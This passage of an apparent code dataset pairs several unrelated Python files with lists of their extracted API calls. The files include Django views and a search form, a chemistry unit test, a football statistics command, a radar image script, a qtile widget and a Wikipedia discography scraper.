form1, 'la': la, 'lo': lo})\n", (8148, 8283), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((9291, 9394), 'django.core.mail.send_mail', 'send_mail', (['"""Hello From Drims Team"""', 'body1', '"""With Regards Drims Team"""', '[email]'], {'fail_silently': '(False)'}), "('Hello From Drims Team', body1, 'With Regards Drims Team', [email\n ], fail_silently=False)\n", (9300, 9394), False, 'from django.core.mail import send_mail\n'), ((11240, 11343), 'django.core.mail.send_mail', 'send_mail', (['"""Hello From Drims Team"""', 'body1', '"""With Regards Drims Team"""', '[email]'], {'fail_silently': '(False)'}), "('Hello From Drims Team', body1, 'With Regards Drims Team', [email\n ], fail_silently=False)\n", (11249, 11343), False, 'from django.core.mail import send_mail\n'), ((11497, 11600), 'django.core.mail.send_mail', 'send_mail', (['"""Hello From Drims Team"""', 'body2', '"""With Regards Drims Team"""', '[email]'], {'fail_silently': '(False)'}), "('Hello From Drims Team', body2, 'With Regards Drims Team', [email\n ], fail_silently=False)\n", (11506, 11600), False, 'from django.core.mail import send_mail\n'), ((12691, 12794), 'django.core.mail.send_mail', 'send_mail', (['"""Hello From Drims Team"""', 'body1', '"""With Regards Drims Team"""', '[email]'], {'fail_silently': '(False)'}), "('Hello From Drims Team', body1, 'With Regards Drims Team', [email\n ], fail_silently=False)\n", (12700, 12794), False, 'from django.core.mail import send_mail\n'), ((13712, 13789), 'django.core.mail.send_mail', 'send_mail', (['"""Hello From Drims Team"""', 'body1', '"""With Regards Drims Team"""', '[email]'], {}), "('Hello From Drims Team', body1, 'With Regards Drims Team', [email])\n", (13721, 13789), False, 'from django.core.mail import send_mail\n'), ((18594, 18679), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Added Product To Wanted List """'], {}), "(request, 'You Have Sucessfully Added Product To Wanted List '\n )\n", (18610, 18679), False, 'from django.contrib import messages\n'), ((18694, 18741), 'django.shortcuts.render', 'render', (['request', '"""wanted_product.html"""', 'context'], {}), "(request, 'wanted_product.html', context)\n", (18700, 18741), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((18915, 18962), 'django.shortcuts.render', 'render', (['request', '"""wanted_product.html"""', 'context'], {}), "(request, 'wanted_product.html', context)\n", (18921, 18962), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((19368, 19441), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Added Transport Options"""'], {}), "(request, 'You Have Sucessfully Added Transport Options')\n", (19384, 19441), False, 'from django.contrib import messages\n'), ((19461, 19486), 'django.shortcuts.redirect', 'redirect', (['"""transport_add"""'], {}), "('transport_add')\n", (19469, 19486), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((19513, 19582), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Please Provide Valid Information !!!"""'], {}), "(request, 'You Please Provide Valid Information !!!')\n", (19529, 19582), False, 'from django.contrib import messages\n'), ((19602, 19627), 'django.shortcuts.redirect', 'redirect', (['"""transport_add"""'], {}), "('transport_add')\n", (19610, 19627), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((6434, 6486), 'django.shortcuts.render', 'render', (['request', '"""price_teller_orders.html"""', 'context'], {}), "(request, 'price_teller_orders.html', context)\n", (6440, 6486), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((6689, 6734), 'django.shortcuts.render', 'render', (['request', '"""buyer_orders.html"""', 'context'], {}), "(request, 'buyer_orders.html', context)\n", (6695, 6734), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((6760, 6780), 'django.shortcuts.redirect', 'redirect', (['"""homepage"""'], {}), "('homepage')\n", (6768, 6780), False, 'from django.shortcuts import render, redirect, get_object_or_404\n')] |
from pyssian.chemistryutils import is_basis,is_method
import unittest
class ChemistryUtilsTest(unittest.TestCase):
def setUp(self):
self.Valid_Basis = '6-311+g(d,p) 6-31g* cc-pVTZ D95V* LanL2DZ SDD28 Def2SVP UGBS2P2++'.split()
self.Fake_Basis = '6-311g+(d,p) 6-31*g ccpVTZ D96V* LanL2TZ SDD Def2SP UGBS2++P2'.split()
self.Valid_Methods = 'ub3lyp mp2 casscf ccsd(t) rm062x WB97XD pbepbe'.split()
self.Fake_Methods = 'bu3lyp pm2 bw97xd m06-2x pbepbe0'.split()
self.Usual_Keywords = 'opt freq scrf scf #p calcfc empiricaldispersion'.split()
def test_valid_isbasis(self):
msg = 'Valid basis not properly recognized'
for valid in self.Valid_Basis:
self.assertTrue(is_basis(valid),msg)
def test_fake_isbasis(self):
msg = 'Fake basis recognized as valid'
for fake in self.Fake_Basis:
self.assertFalse(is_basis(fake),msg)
def test_valid_ismethod(self):
msg = 'Valid method not properly recognized'
for valid in self.Valid_Methods:
self.assertTrue(is_method(valid),msg)
def test_fake_ismethod(self):
msg = 'Fake method recognized as valid'
for fake in self.Fake_Methods:
self.assertFalse(is_method(fake),msg)
def test_usual_keywords(self):
msg1 = 'Keyword recognized as basis'
msg2 = 'Keyword recognized as method'
for keyword in self.Usual_Keywords:
self.assertFalse(is_basis(keyword),msg1)
self.assertFalse(is_method(keyword),msg2)
| [
"pyssian.chemistryutils.is_method",
"pyssian.chemistryutils.is_basis"
] | [((736, 751), 'pyssian.chemistryutils.is_basis', 'is_basis', (['valid'], {}), '(valid)\n', (744, 751), False, 'from pyssian.chemistryutils import is_basis, is_method\n'), ((903, 917), 'pyssian.chemistryutils.is_basis', 'is_basis', (['fake'], {}), '(fake)\n', (911, 917), False, 'from pyssian.chemistryutils import is_basis, is_method\n'), ((1080, 1096), 'pyssian.chemistryutils.is_method', 'is_method', (['valid'], {}), '(valid)\n', (1089, 1096), False, 'from pyssian.chemistryutils import is_basis, is_method\n'), ((1252, 1267), 'pyssian.chemistryutils.is_method', 'is_method', (['fake'], {}), '(fake)\n', (1261, 1267), False, 'from pyssian.chemistryutils import is_basis, is_method\n'), ((1472, 1489), 'pyssian.chemistryutils.is_basis', 'is_basis', (['keyword'], {}), '(keyword)\n', (1480, 1489), False, 'from pyssian.chemistryutils import is_basis, is_method\n'), ((1525, 1543), 'pyssian.chemistryutils.is_method', 'is_method', (['keyword'], {}), '(keyword)\n', (1534, 1543), False, 'from pyssian.chemistryutils import is_basis, is_method\n')] |
"""
Objectives:
- Which players pass together the most?
- What types of position combintations are most frequent in pass-sequences?
"""
"""
Sample Run Script: python manage.py analysis3 --team_uuid="t1326"
--print_to_csv
python manage.py analysis4 --team_uuid="t1326" --start_date="2016-07-01"
python manage.py analysis4 --team_uuid="t1326" --start_date="2016-01-01" --end_date="2016-07-01"
"""
import datetime
import csv
import os
import time
from django.core.management.base import BaseCommand, CommandError
from eventstatistics.models import EventStatistic
from qualifiers.models import Qualifier
from games.models import Game
from lineups.models import Lineup
from players.models import Player
from playerstatistics.models import PlayerStatistic
from salaries.models import Salary
from statistictypes.models import StatisticType
from teams.models import Team
from teamstatistics.models import TeamStatistic
from venues.models import Venue
import utils.analysis as ua
import utils.f24_analysis as uf24
class Command(BaseCommand):
help = 'Pull the statistics of a team across a time-range; classify by outcome'
def add_arguments(self,parser):
# add optional print to csv flag
parser.add_argument(
"--team_uuid",
dest="team_uuid",
default="",
help="Desried Opta team ID",
)
parser.add_argument(
"--print_to_csv",
action="store_true",
dest="print_to_csv",
default=False,
help="save file?",
)
parser.add_argument(
"--start_date",
dest="start_date",
default='1900-01-01',
help="Example format: 1900-01-31",
)
parser.add_argument(
"--end_date",
dest="end_date",
default='2900-01-01',
help="Example format: 1900-01-31",
)
def handle(self,*args,**options):
#handle import parameters
if not options["team_uuid"]:
raise Exception("Opta team ID is needed")
is_print_to_csv = options["print_to_csv"]
arg_team_uuid = str(options["team_uuid"])
arg_start_date = str(options["start_date"])
arg_end_date = str(options["end_date"])
arg_start_date = datetime.datetime.strptime(arg_start_date, "%Y-%m-%d")
arg_end_date = datetime.datetime.strptime(arg_end_date, "%Y-%m-%d")
#load team
db_team = Team.objects.get(uuid=arg_team_uuid)
#pull list of games tied to the team
team_games = ua.team_list_games(db_team, arg_start_date, arg_end_date)
for game in team_games:
# print "\nAnalyzing Passes for %s in %s" % (db_team, str(game))
for item in uf24.identify_shots(game, db_team):
#print item
# print "\n"
# print "start: backtrack function"
backtracked = uf24.backtrack(item)
# for i in backtracked:
# print " " + str(i)
# print "end: backtrack function"
# print "start: parse backtrack"
uf24.parse_backtrack(item, backtracked)
# print "end: parse backtrack"
| [
"utils.f24_analysis.backtrack",
"utils.analysis.team_list_games",
"datetime.datetime.strptime",
"teams.models.Team.objects.get",
"utils.f24_analysis.parse_backtrack",
"utils.f24_analysis.identify_shots"
] | [((2198, 2252), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['arg_start_date', '"""%Y-%m-%d"""'], {}), "(arg_start_date, '%Y-%m-%d')\n", (2224, 2252), False, 'import datetime\n'), ((2270, 2322), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['arg_end_date', '"""%Y-%m-%d"""'], {}), "(arg_end_date, '%Y-%m-%d')\n", (2296, 2322), False, 'import datetime\n'), ((2349, 2385), 'teams.models.Team.objects.get', 'Team.objects.get', ([], {'uuid': 'arg_team_uuid'}), '(uuid=arg_team_uuid)\n', (2365, 2385), False, 'from teams.models import Team\n'), ((2441, 2498), 'utils.analysis.team_list_games', 'ua.team_list_games', (['db_team', 'arg_start_date', 'arg_end_date'], {}), '(db_team, arg_start_date, arg_end_date)\n', (2459, 2498), True, 'import utils.analysis as ua\n'), ((2613, 2647), 'utils.f24_analysis.identify_shots', 'uf24.identify_shots', (['game', 'db_team'], {}), '(game, db_team)\n', (2632, 2647), True, 'import utils.f24_analysis as uf24\n'), ((2745, 2765), 'utils.f24_analysis.backtrack', 'uf24.backtrack', (['item'], {}), '(item)\n', (2759, 2765), True, 'import utils.f24_analysis as uf24\n'), ((2901, 2940), 'utils.f24_analysis.parse_backtrack', 'uf24.parse_backtrack', (['item', 'backtracked'], {}), '(item, backtracked)\n', (2921, 2940), True, 'import utils.f24_analysis as uf24\n')] |
#!/usr/bin/env ipython
import numpy as np
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class gral():
def __init__(self):
self.name = ''
sh, mc = gral(), gral()
cr = gral()
cr.sh, cr.mc = gral(), gral()
vlo, vhi = 550.0, 3000.0 #550., 3000. #100.0, 450.0 #550.0, 3000.0
dir_inp_sh = '../../../sheaths/ascii/MCflag2/wShiftCorr/_test_Vmc_'
dir_inp_mc = '../../../mcs/ascii/MCflag2/wShiftCorr/_test_Vmc_'
fname_inp_part = 'MCflag2_2before.4after_fgap0.2_Wang90.0_vlo.%4.1f.vhi.%4.1f' % (vlo, vhi)
fname_sh = dir_inp_sh + '/%s_V.txt' % fname_inp_part
fname_mc = dir_inp_mc + '/%s_V.txt' % fname_inp_part
sh.data = np.loadtxt(fname_sh).T
mc.data = np.loadtxt(fname_mc).T
sh.t, sh.avr = sh.data[0], sh.data[2]
mc.t, mc.avr = mc.data[0], mc.data[2]
#++++++++++++++++++++++++++++++++++++++++++++++++++++
fname_sh = dir_inp_sh + '/%s_CRs.txt' % fname_inp_part
fname_mc = dir_inp_mc + '/%s_CRs.txt' % fname_inp_part
cr.sh.data = np.loadtxt(fname_sh).T
cr.mc.data = np.loadtxt(fname_mc).T
cr.sh.t, cr.sh.avr = cr.sh.data[0], cr.sh.data[2]
cr.mc.t, cr.mc.avr = cr.mc.data[0], cr.mc.data[2]
| [
"numpy.loadtxt"
] | [((687, 707), 'numpy.loadtxt', 'np.loadtxt', (['fname_sh'], {}), '(fname_sh)\n', (697, 707), True, 'import numpy as np\n'), ((720, 740), 'numpy.loadtxt', 'np.loadtxt', (['fname_mc'], {}), '(fname_mc)\n', (730, 740), True, 'import numpy as np\n'), ((1005, 1025), 'numpy.loadtxt', 'np.loadtxt', (['fname_sh'], {}), '(fname_sh)\n', (1015, 1025), True, 'import numpy as np\n'), ((1041, 1061), 'numpy.loadtxt', 'np.loadtxt', (['fname_mc'], {}), '(fname_mc)\n', (1051, 1061), True, 'import numpy as np\n')] |
# Copyright 2018-2019 CRS4
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""\
Select radar images in the time range of each meteo sim.
Works on NetCDF datasets created with tdm grib2cf.
"""
import datetime
import argparse
import os
import sys
import tdm.radar.utils as utils
import cdo
basename = os.path.basename
join = os.path.join
strftime = datetime.datetime.strftime
strptime = datetime.datetime.strptime
FMT = "%Y-%m-%dT%H:%M:%S"
MODELS = frozenset(("bolam", "moloch"))
# E.g., bolam_2018073001_6155f56b-40b1-4b9f-bad7-e785940b2076.nc
def get_paths(nc_dir):
rval = {}
for name in os.listdir(nc_dir):
tag, ext = os.path.splitext(name)
if ext != ".nc":
continue
parts = tag.split("_")
if parts[0] not in MODELS:
continue
ts = parts[1]
if ts == "IFS":
ts = parts[2]
date = strptime(ts, "%Y%m%d%H").date()
date_str = datetime.date.strftime(date, "%Y-%m-%d")
rval.setdefault(date_str, []).append(join(nc_dir, name))
return rval
def get_dt_range(cdo_obj, nc):
out = cdo_obj.showtimestamp(input=nc)[0]
dts = [strptime(_, FMT) for _ in out.split()]
return min(dts), max(dts)
def main(args):
nc_paths = get_paths(args.sim_dir)
c = cdo.Cdo()
for date_str, nc_list in nc_paths.items():
print("%s IN:" % date_str)
start_list, stop_list = [], []
for nc in nc_list:
start, stop = get_dt_range(c, nc)
print(" %s (%s to %s)" % (basename(nc), start, stop))
start_list.append(start)
stop_list.append(stop)
start, stop = min(start_list), max(stop_list)
out_subd = join(args.out_dir, date_str)
print("%s OUT:" % date_str)
print(" %s (%s to %s)" % (date_str, start, stop))
sys.stdout.flush()
try:
os.makedirs(out_subd)
except FileExistsError:
pass
pairs = utils.get_images(args.radar_dir, after=start, before=stop)
for dt, src in pairs:
out_name = "%s.png" % strftime(dt, utils.FMT)
dst = join(out_subd, out_name)
with open(src, "rb") as fi, open(dst, "wb") as fo:
fo.write(fi.read())
print()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("sim_dir", metavar="NETCDF_SIM_DIR")
parser.add_argument("radar_dir", metavar="PNG_RADAR_DIR")
parser.add_argument("-o", "--out-dir", metavar="DIR", default=os.getcwd())
main(parser.parse_args(sys.argv[1:]))
| [
"os.listdir",
"cdo.Cdo",
"argparse.ArgumentParser",
"os.makedirs",
"os.path.splitext",
"os.getcwd",
"tdm.radar.utils.get_images",
"sys.stdout.flush",
"datetime.date.strftime"
] | [((1097, 1115), 'os.listdir', 'os.listdir', (['nc_dir'], {}), '(nc_dir)\n', (1107, 1115), False, 'import os\n'), ((1775, 1784), 'cdo.Cdo', 'cdo.Cdo', ([], {}), '()\n', (1782, 1784), False, 'import cdo\n'), ((2801, 2845), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '__doc__'}), '(description=__doc__)\n', (2824, 2845), False, 'import argparse\n'), ((1136, 1158), 'os.path.splitext', 'os.path.splitext', (['name'], {}), '(name)\n', (1152, 1158), False, 'import os\n'), ((1430, 1470), 'datetime.date.strftime', 'datetime.date.strftime', (['date', '"""%Y-%m-%d"""'], {}), "(date, '%Y-%m-%d')\n", (1452, 1470), False, 'import datetime\n'), ((2323, 2341), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2339, 2341), False, 'import sys\n'), ((2454, 2512), 'tdm.radar.utils.get_images', 'utils.get_images', (['args.radar_dir'], {'after': 'start', 'before': 'stop'}), '(args.radar_dir, after=start, before=stop)\n', (2470, 2512), True, 'import tdm.radar.utils as utils\n'), ((2367, 2388), 'os.makedirs', 'os.makedirs', (['out_subd'], {}), '(out_subd)\n', (2378, 2388), False, 'import os\n'), ((3035, 3046), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3044, 3046), False, 'import os\n')] |
import logging
from django.apps import apps
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404, HttpResponse, JsonResponse
from django.views.generic import TemplateView, View
from zentral.core.stores import frontend_store
logger = logging.getLogger("server.base.views")
class HealthCheckView(View):
def get(self, request, *args, **kwargs):
return HttpResponse('OK')
class IndexView(LoginRequiredMixin, TemplateView):
template_name = "base/index.html"
def get_context_data(self, **kwargs):
context = super(IndexView, self).get_context_data(**kwargs)
app_list = []
for app_name, app_config in apps.app_configs.items():
if getattr(app_config, "events_module", None) is not None:
app_list.append(app_name)
app_list.sort()
context["apps"] = app_list
return context
class AppHistogramDataView(LoginRequiredMixin, View):
INTERVAL_DATE_FORMAT = {
"hour": "%H:%M",
"day": "%d/%m",
"week": "%d/%m",
"month": "%m/%y",
}
def get(self, request, *args, **kwargs):
app = kwargs['app']
try:
zentral_app = apps.app_configs[app]
search_dict = getattr(zentral_app.events_module, "ALL_EVENTS_SEARCH_DICT")
except (KeyError, AttributeError):
raise Http404
interval = kwargs["interval"]
try:
date_format = self.INTERVAL_DATE_FORMAT[interval]
except KeyError:
raise Http404
labels = []
event_count_data = []
unique_msn_data = []
for dt, event_count, unique_msn in frontend_store.get_app_hist_data(interval, int(kwargs["bucket_number"]),
**search_dict):
labels.append(dt.strftime(date_format))
event_count_data.append(event_count)
unique_msn_data.append(unique_msn)
datasets = {"event_count": {
"label": "{} events".format(app),
"backgroundColor": "rgba(122, 182, 160, 0.7)",
"data": event_count_data
},
"unique_msn": {
"label": "{} machines".format(app),
"backgroundColor": "rgba(225, 100, 86, 0.7)",
"data": unique_msn_data
}}
return JsonResponse({"app": app,
"labels": labels,
"datasets": datasets})
| [
"logging.getLogger",
"django.http.HttpResponse",
"django.apps.apps.app_configs.items",
"django.http.JsonResponse"
] | [((272, 310), 'logging.getLogger', 'logging.getLogger', (['"""server.base.views"""'], {}), "('server.base.views')\n", (289, 310), False, 'import logging\n'), ((402, 420), 'django.http.HttpResponse', 'HttpResponse', (['"""OK"""'], {}), "('OK')\n", (414, 420), False, 'from django.http import Http404, HttpResponse, JsonResponse\n'), ((681, 705), 'django.apps.apps.app_configs.items', 'apps.app_configs.items', ([], {}), '()\n', (703, 705), False, 'from django.apps import apps\n'), ((2473, 2539), 'django.http.JsonResponse', 'JsonResponse', (["{'app': app, 'labels': labels, 'datasets': datasets}"], {}), "({'app': app, 'labels': labels, 'datasets': datasets})\n", (2485, 2539), False, 'from django.http import Http404, HttpResponse, JsonResponse\n')] |
from libqtile.widget import base
from libqtile import bar, hook
__all__ = ['She']
class She(base._TextBox):
''' Widget to display the Super Hybrid Engine status.
can display either the mode or CPU speed on eeepc computers.'''
defaults = [
('device', '/sys/devices/platform/eeepc/cpufv', 'sys path to cpufv'),
('format', 'speed', 'Type of info to display "speed" or "name"'),
('update_delay', 0.5, 'Update Time in seconds.'),
]
def __init__(self, width=bar.CALCULATED, **config):
base._TextBox.__init__(self, 'CPU', **config)
self.add_defaults(She.defaults)
self.modes = {
'0x300': {'name': 'Performance', 'speed': '1.6GHz'},
'0x301': {'name': 'Normal', 'speed': '1.2GHz'},
'0x302': {'name': 'PoswerSave', 'speed': '800MHz'}
}
self.modes_index = self.modes.keys().sort()
self.mode = None
self.timeout_add(self.update_delay, self.update)
def _get_mode(self):
with open(self.device) as f:
mode = f.read().strip()
return mode
def update(self):
if self.configured:
mode = self._get_mode()
if mode != self.mode:
self.mode = mode
self.draw()
return True
def draw(self):
if self.mode in self.modes.keys():
self.text = self.modes[self.mode][self.format]
else:
self.text = self.mode
base._TextBox.draw(self)
| [
"libqtile.widget.base._TextBox.draw",
"libqtile.widget.base._TextBox.__init__"
] | [((536, 581), 'libqtile.widget.base._TextBox.__init__', 'base._TextBox.__init__', (['self', '"""CPU"""'], {}), "(self, 'CPU', **config)\n", (558, 581), False, 'from libqtile.widget import base\n'), ((1477, 1501), 'libqtile.widget.base._TextBox.draw', 'base._TextBox.draw', (['self'], {}), '(self)\n', (1495, 1501), False, 'from libqtile.widget import base\n')] |
import sys
import requests
from statistics import mean, stdev
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
class Disco():
def __init__(self, artist):
self.website_url = "https://en.wikipedia.org"
disco_soup = self.get_disco_soup(artist)
album_urls = self.get_album_urls(disco_soup)
self.display_track_stats(artist, album_urls)
def get_soup(self, url):
html = requests.get(url)
soup = BeautifulSoup(html.content, "html.parser")
return soup
def get_disco_soup(self, artist):
artist = '_'.join(artist.split(' '))
disco_url = "%s/wiki/%s_discography" % (self.website_url, artist)
disco_soup = self.get_soup(disco_url)
return disco_soup
def get_album_urls(self, disco_soup):
album_urls = []
table = disco_soup.find("table", {"class" : "wikitable plainrowheaders"})
for th in table.find_all("th", {"scope" : "row"}):
album_urls.append(self.website_url + th.find("i").find("a")["href"])
return album_urls
def get_track_lengths(self, album_urls):
track_lengths = {}
for album_url in album_urls:
album_soup = self.get_soup(album_url)
songs = album_soup.find("table", {"class" : "tracklist"})
for row in songs.find_all("tr"):
try:
title = row.find("td", {"style" : "vertical-align:top"}).text
length = row.find_all("td", {"style" : "padding-right:10px;text-align:right;vertical-align:top"})[-1].text
track_lengths[title] = int(self.timestring_to_seconds(length))
except:
pass
return track_lengths
def display_track_stats(self, artist, album_urls):
track_lengths = self.get_track_lengths(album_urls)
shortest_track = min(track_lengths, key=track_lengths.get)
longest_track = max(track_lengths, key=track_lengths.get)
min_length = self.seconds_to_timestring(track_lengths[shortest_track])
max_length = self.seconds_to_timestring(track_lengths[longest_track])
mean_length = self.seconds_to_timestring(int(mean(track_lengths.values())))
std_length = self.seconds_to_timestring(int(stdev(track_lengths.values())))
print("The shortest %s track is %s at %s." % (artist, shortest_track, min_length))
print("The longest %s track is %s at %s." % (artist, longest_track, max_length))
print("The average %s track length is %s with a standard deviation of %s." % (artist, mean_length, std_length))
plt.hist(track_lengths.values())
plt.xlabel("Track length (seconds)")
plt.ylabel("Number of songs")
plt.show()
def timestring_to_seconds(self, timestring):
minutes, seconds = timestring.split(":")
return (60*int(minutes) + int(seconds))
def seconds_to_timestring(self, seconds):
minutes = str(seconds//60)
seconds = str(seconds%60)
if len(seconds) < 2:
seconds = list(seconds)
seconds.insert(0, '0')
seconds = ''.join(seconds)
return "%s:%s" % (minutes, seconds)
if __name__ == '__main__':
if len(sys.argv) == 1:
artist = "<NAME>"
else:
artist = ' '.join(sys.argv[1:])
Disco(artist)
| [
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"requests.get",
"bs4.BeautifulSoup",
"matplotlib.pyplot.show"
] | [((427, 444), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (439, 444), False, 'import requests\n'), ((460, 502), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html.content', '"""html.parser"""'], {}), "(html.content, 'html.parser')\n", (473, 502), False, 'from bs4 import BeautifulSoup\n'), ((2668, 2704), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Track length (seconds)"""'], {}), "('Track length (seconds)')\n", (2678, 2704), True, 'import matplotlib.pyplot as plt\n'), ((2713, 2742), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Number of songs"""'], {}), "('Number of songs')\n", (2723, 2742), True, 'import matplotlib.pyplot as plt\n'), ((2751, 2761), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2759, 2761), True, 'import matplotlib.pyplot as plt\n')] |
from django.conf.urls import url
from .views import (
add,
clear,
remove,
remove_single,
set_quantity,
show
)
urlpatterns = [
url(r'^show/$', show, name='carton-tests-show'),
url(r'^add/$', add, name='carton-tests-add'),
url(r'^remove/$', remove, name='carton-tests-remove'),
url(r'^remove-single/$', remove_single, name='carton-tests-remove-single'),
url(r'^clear/$', clear, name='carton-tests-clear'),
url(r'^set-quantity/$', set_quantity, name='carton-tests-set-quantity'),
]
| [
"django.conf.urls.url"
] | [((157, 203), 'django.conf.urls.url', 'url', (['"""^show/$"""', 'show'], {'name': '"""carton-tests-show"""'}), "('^show/$', show, name='carton-tests-show')\n", (160, 203), False, 'from django.conf.urls import url\n'), ((210, 253), 'django.conf.urls.url', 'url', (['"""^add/$"""', 'add'], {'name': '"""carton-tests-add"""'}), "('^add/$', add, name='carton-tests-add')\n", (213, 253), False, 'from django.conf.urls import url\n'), ((260, 312), 'django.conf.urls.url', 'url', (['"""^remove/$"""', 'remove'], {'name': '"""carton-tests-remove"""'}), "('^remove/$', remove, name='carton-tests-remove')\n", (263, 312), False, 'from django.conf.urls import url\n'), ((319, 392), 'django.conf.urls.url', 'url', (['"""^remove-single/$"""', 'remove_single'], {'name': '"""carton-tests-remove-single"""'}), "('^remove-single/$', remove_single, name='carton-tests-remove-single')\n", (322, 392), False, 'from django.conf.urls import url\n'), ((399, 448), 'django.conf.urls.url', 'url', (['"""^clear/$"""', 'clear'], {'name': '"""carton-tests-clear"""'}), "('^clear/$', clear, name='carton-tests-clear')\n", (402, 448), False, 'from django.conf.urls import url\n'), ((455, 525), 'django.conf.urls.url', 'url', (['"""^set-quantity/$"""', 'set_quantity'], {'name': '"""carton-tests-set-quantity"""'}), "('^set-quantity/$', set_quantity, name='carton-tests-set-quantity')\n", (458, 525), False, 'from django.conf.urls import url\n')] |
from haystack.forms import FacetedSearchForm
from haystack.query import SQ
from django import forms
from hs_core.discovery_parser import ParseSQ, MatchingBracketsNotFoundError, \
FieldNotRecognizedError, InequalityNotAllowedError, MalformedDateError
FACETS_TO_SHOW = ['creator', 'contributor', 'owner', 'content_type', 'subject', 'availability']
class DiscoveryForm(FacetedSearchForm):
SORT_ORDER_VALUES = ('title', 'author', 'created', 'modified')
SORT_ORDER_CHOICES = (('title', 'Title'),
('author', 'First Author'),
('created', 'Date Created'),
('modified', 'Last Modified'))
SORT_DIRECTION_VALUES = ('', '-')
SORT_DIRECTION_CHOICES = (('', 'Ascending'),
('-', 'Descending'))
NElat = forms.CharField(widget=forms.HiddenInput(), required=False)
NElng = forms.CharField(widget=forms.HiddenInput(), required=False)
SWlat = forms.CharField(widget=forms.HiddenInput(), required=False)
SWlng = forms.CharField(widget=forms.HiddenInput(), required=False)
start_date = forms.DateField(label='From Date', required=False)
end_date = forms.DateField(label='To Date', required=False)
coverage_type = forms.CharField(widget=forms.HiddenInput(), required=False)
sort_order = forms.CharField(label='Sort By:',
widget=forms.Select(choices=SORT_ORDER_CHOICES),
required=False)
sort_direction = forms.CharField(label='Sort Direction:',
widget=forms.Select(choices=SORT_DIRECTION_CHOICES),
required=False)
def search(self):
self.parse_error = None # error return from parser
sqs = self.searchqueryset.all().filter(replaced=False)
if self.cleaned_data.get('q'):
# The prior code corrected for an failed match of complete words, as documented
# in issue #2308. This version instead uses an advanced query syntax in which
# "word" indicates an exact match and the bare word indicates a stemmed match.
cdata = self.cleaned_data.get('q')
try:
parser = ParseSQ()
parsed = parser.parse(cdata)
sqs = sqs.filter(parsed)
except ValueError as e:
sqs = self.searchqueryset.none()
self.parse_error = "Value error: {}. No matches. Please try again".format(e.value)
return sqs
except MatchingBracketsNotFoundError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
except MalformedDateError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
except FieldNotRecognizedError as e:
sqs = self.searchqueryset.none()
self.parse_error = \
("{} Field delimiters include title, contributor, subject, etc. " +
"Please try again.")\
.format(e.value)
return sqs
except InequalityNotAllowedError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
geo_sq = None
if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']:
if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']):
geo_sq = SQ(east__lte=float(self.cleaned_data['NElng']))
geo_sq.add(SQ(east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
else:
geo_sq = SQ(east__gte=float(self.cleaned_data['SWlng']))
geo_sq.add(SQ(east__lte=float(180)), SQ.OR)
geo_sq.add(SQ(east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(east__gte=float(-180)), SQ.AND)
if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']:
# latitude might be specified without longitude
if geo_sq is None:
geo_sq = SQ(north__lte=float(self.cleaned_data['NElat']))
else:
geo_sq.add(SQ(north__lte=float(self.cleaned_data['NElat'])), SQ.AND)
geo_sq.add(SQ(north__gte=float(self.cleaned_data['SWlat'])), SQ.AND)
if geo_sq is not None:
sqs = sqs.filter(geo_sq)
# Check to see if a start_date was chosen.
start_date = self.cleaned_data['start_date']
end_date = self.cleaned_data['end_date']
# allow overlapping ranges
# cs < s < ce OR s < cs => s < ce
# AND
# cs < e < ce OR e > ce => cs < e
if start_date and end_date:
sqs = sqs.filter(SQ(end_date__gte=start_date) &
SQ(start_date__lte=end_date))
elif start_date:
sqs = sqs.filter(SQ(end_date__gte=start_date))
elif end_date:
sqs = sqs.filter(SQ(start_date__lte=end_date))
if self.cleaned_data['coverage_type']:
sqs = sqs.filter(coverage_types__in=[self.cleaned_data['coverage_type']])
creator_sq = None
contributor_sq = None
owner_sq = None
subject_sq = None
content_type_sq = None
availability_sq = None
# We need to process each facet to ensure that the field name and the
# value are quoted correctly and separately:
for facet in self.selected_facets:
if ":" not in facet:
continue
field, value = facet.split(":", 1)
value = sqs.query.clean(value)
if value:
if "creator" in field:
if creator_sq is None:
creator_sq = SQ(creator__exact=value)
else:
creator_sq.add(SQ(creator__exact=value), SQ.OR)
if "contributor" in field:
if contributor_sq is None:
contributor_sq = SQ(contributor__exact=value)
else:
